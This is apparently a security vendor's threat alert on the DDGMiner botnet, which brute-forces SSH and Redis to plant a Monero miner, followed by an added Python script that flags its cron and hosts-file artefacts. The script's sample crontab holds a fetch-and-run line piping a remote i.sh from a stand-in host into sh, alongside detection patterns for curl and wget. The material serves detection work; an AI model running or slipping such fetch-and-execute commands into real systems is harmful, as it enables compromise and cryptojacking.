Rewterz Threat Alert – 8 Year-Old Bug Resurrected for LimeRAT Campaign
April 2, 2020
Rewterz Threat Alert – Formbook delivered by Covid-19 lure
April 3, 2020
Severity
High
Description
Password brute-force attacks against SSH servers are being launched by the large mining botnet DDGMiner in order to mine Monero, consuming excessive system resources and disabling some security products.
Analysis Summary
Recently, a security researcher detected a weak-password brute-force attack on an SSH server. The attack was initiated by the large mining botnet DDGMiner, which scans and attacks SSH services, Redis databases, OrientDB databases and other servers, and implants a mining Trojan on each compromised server to mine Monero for profit. DDGMiner’s main propagation method is still SSH brute-forcing. Once a host has been compromised through weak passwords or exploits, the attackers first download the shell script i.sh and install it as a crontab scheduled task that executes every 15 minutes.

The DDG botnet mainly scans SSH and Redis services to brute-force its way into Linux systems and mine Monero for profit. The mining Trojan is continuously updated by the attackers; 9 new versions were released in the past month alone. After the DDG mining Trojan executes, it requests and downloads a configuration file, and according to that configuration it runs the mining Trojan wordpress and the virus script i.sh. In addition, the latest version of the DDG mining Trojan downloads the uninstall.sh and quartz_uninstall.sh scripts, which uninstall security protection products such as Tencent Yunyun Mirror and Ali Yunan Knight to extend the survival time of the mining Trojan on the server.

The mining activity greatly degrades server performance. The Trojan also modifies the hosts file to map the URLs of competing Trojans, such as trumpzwlvlyrvlss.onion, to the IP address 0.0.0.0, blocking competitors’ Trojans so that it can monopolize system resources. The Monero mining Trojan wordpress is built from the open source mining program XMRig.
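As an added defender-side example (not from the Rewterz alert), the following Python checks a crontab and an /etc/hosts file for the two host artefacts described above: a cron job that runs every 15 minutes and fetches i.sh, and a competitor .onion domain mapped to 0.0.0.0. The remote host example.invalid and both sample files are constructed for the example.

```python
import re
from typing import List

# Constructed sample inputs (not from the alert), modelled on the behaviour it describes:
# a crontab entry that fetches and runs a remote i.sh every 15 minutes, and a hosts file
# entry that sinkholes a competing Trojan's .onion domain to 0.0.0.0.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/15 * * * * curl -fsSL http://example.invalid/i.sh | sh
"""
SAMPLE_HOSTS = """\
127.0.0.1 localhost
0.0.0.0 trumpzwlvlyrvlss.onion
"""

# Schedule field "*/15 * * * *" = every 15 minutes, as the alert describes.
EVERY_15_MIN = re.compile(r"^\*/15\s+\*\s+\*\s+\*\s+\*\s+")
# Command fetches a remote resource (curl/wget) or references the i.sh script by name.
FETCH_OR_ISH = re.compile(r"\b(curl|wget)\b|\bi\.sh\b")


def suspicious_cron_entries(crontab_text: str) -> List[str]:
    """Return crontab lines that run every 15 minutes and fetch a script or invoke i.sh."""
    hits = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if EVERY_15_MIN.match(line) and FETCH_OR_ISH.search(line):
            hits.append(line)
    return hits


def sinkholed_onion_hosts(hosts_text: str) -> List[str]:
    """Return .onion hostnames that an /etc/hosts file maps to 0.0.0.0 (competitor blocking)."""
    hits = []
    for raw in hosts_text.splitlines():
        fields = raw.split("#", 1)[0].split()  # drop trailing comments, then tokenize
        if len(fields) >= 2 and fields[0] == "0.0.0.0":
            hits.extend(name for name in fields[1:] if name.endswith(".onion"))
    return hits


if __name__ == "__main__":
    print("suspicious cron entries:", suspicious_cron_entries(SAMPLE_CRONTAB))
    print("sinkholed .onion hosts:", sinkholed_onion_hosts(SAMPLE_HOSTS))
```

On a live host the same functions can be fed the output of `crontab -l` for each user plus the files under /etc/cron.d, and the contents of /etc/hosts.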
Impact
- Consumption of system resources
- Possible denial of service
- Disabling of some security products
Indicators of Compromise
Source IP
- 67[.]205[.]168[.]20
Remediation
- Block the threat indicators at their respective controls.
- Prioritize patching of security vulnerabilities in the relevant components of enterprise servers.
- Use strong Redis and SSH login passwords.
- Add firewall rules where necessary to block access from untrusted source IPs.